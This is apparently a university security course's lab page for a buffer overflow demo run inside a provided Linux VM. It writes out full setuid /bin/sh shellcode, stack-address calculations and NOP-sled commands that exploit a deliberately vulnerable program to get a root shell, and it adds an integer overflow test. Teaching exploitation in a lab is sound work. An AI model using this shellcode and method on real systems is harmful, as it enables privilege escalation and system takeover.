• View
• Edit
• History
• Print

Vulnerability-demo

Prerequisites

These in-class demonstrations are designed to work inside a virtual machine running (an ancient) version of Linux. We provide basic VM images for either Oracle VirtualBox or vmware. CSL Linux machines all have VirtualBox pre-installed.

• Download Oracle's Virtual Box: https://www.virtualbox.org/wiki/Downloads
• Download VMware: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0

VMware is only available free on Linux and Windows; if you have VMware fusion for Mac that may work as well.

VM images

VirtualBox

• OVF: http://pages.cs.wisc.edu/~cs642-1/assets/Boxes2.ovf
• Disk: http://pages.cs.wisc.edu/~cs642-1/assets/Boxes2-disk1.vmdk

Use the "Import" command on the file menu to create a virtual machine from these files.

If you are using a CS-supported machine:

You will have to enable Port forwarding to access VM from any terminal using SSH. Log into the VM and find the IP address assigned by issuing the following command:

 /sbin/ifconfig

On the Virtual Box application window where VM is listed, right click VM listed and click Settings In Network Tab under Adapter 1, select “NAT” in 'Attached to' option Under Advanced, click forwarding which open a Window to set Port Forwarding option Add an entry there with following fields

 --------------------------------------------------------------------------------------------------------------------------------------
 |      Name          | Protocol |              Host IP           |             Host Port            | Guest IP     | Guest Port |
 --------------------------------------------------------------------------------------------------------------------------------------
 |    Some Name  |     TCP   | <loop back address> | <Random Port > 1024> | <IP in VM> |         22       |
 --------------------------------------------------------------------------------------------------------------------------------------

Example:

 --------------------------------------------------------------------------------------------------------------------------------------

| Rule 1 | TCP | 127.0.0.1 | 2222 | 10.0.2.15 | 22 |

 --------------------------------------------------------------------------------------------------------------------------------------

Save the settings and restart your Virtual Machine. Now SSH into the VM from terminal using the following command

            ssh -p 2222 user@127.0.0.1

You can also SCP files into VM using the following command

            scp -P 2222 file1 user@127.0.0.1:~/

VMware

Image: http://pages.cs.wisc.edu/~cs642-1/assets/vmware-boxes-2.1.tar.bz2

Tips for these VM images

• The user account username/password: `user/user`
• The root account username/password: `root/root`

SSH access

Sometimes accessing the VM via SSH is easier (copy-paste may work better, and you can transfer files both way using the scp command). Startup the VM, login as user or root, find the local IP address using the command:

  /sbin/ifconfig

Find the inet address assigned to this VM.

  inet addr:172.16.250.140

Connect via SSH:

  ssh user@172.16.250.140

If this does not work, you may need to change network settings for the VM. On VirtualBox, you may want to switch to "Host-only Adapter" from the settings/network dialog box.

Download sources files to a demo directory:

• get_sp.c
• meet.c
• width.c

Copy files _TO_ the VM:

  scp demo/* user@172.16.250.140:~/

Copy files _FROM_ the VM:

  scp user@172.16.250.140:~/* demo/

Resources

This meet.c exploit demo is taken form Chapter 11 of the Ethicial Hacker's Handbook. See this document if you get stuck and need more information.

Test and crash meet

Build our source

On the VM, after you've copied these source files, compile the source code.

  gcc -o meet meet.c
  gcc -o get_sp get_sp.c

Test and break meet

  ./meet swift H@x0r
  perl -e 'print "A"x200'
  echo $(perl -e 'print "A"x200')
  ./meet swift $(perl -e 'print "A"x200')
  ./meet swift $(perl -e 'print "A"x500')

You can substitute your name for 'swift' if you want to.

Control-flow hijack for meet.c

Setup setuid super-meet

Make a copy of meet and mark setuid (remember root password is root).

  su root
  cp meet super-meet
  chown root:root super-meet
  chmod u+s super-meet
  exit

Generate shellcode

Be careful copy-pasting this command. Copy-pasting might introduce unintended line break characters.

  perl -e 'print

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode

Check the length: shellcode should be 53. If not, something is wrong. Maybe you accidentally added an unintended line break or some other character.

  wc -c shellcode

Get the stack pointer

  ./get_sp

Check it twice! It shouldn't change.

  ./get_sp

Compute an approximate landing spot: ESP - 0x300

(In the lines below, substitute your own ESP values.)

Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372

Convert to little-endian: 0x72 0xf3 0xff 0xbf Use perl to print these 38 times

  perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat

Running the exploit

Run the exploit. Keep changing the size of the nop sled until you align the exploit properly on the stack. Try 200, 201, 202, ....

  ./meet swift $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)

Check super-meet, should be marked setuid

 ls -l

Check your id, should be user(1000)

  id

Run the exploit against super-meet. If you get a shell, check your uid using `id`.

  ./super-meet swift "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"

Test integer overflow vulnerability

  gcc -o width width.c
  ./width 5 "Hello there"
  ./width 85 "Hello there"
  ./width 65536 "Hello there"

Issues

If you find any problems with this demo: send me an email, file an issue, or better yet, just send me a pull request.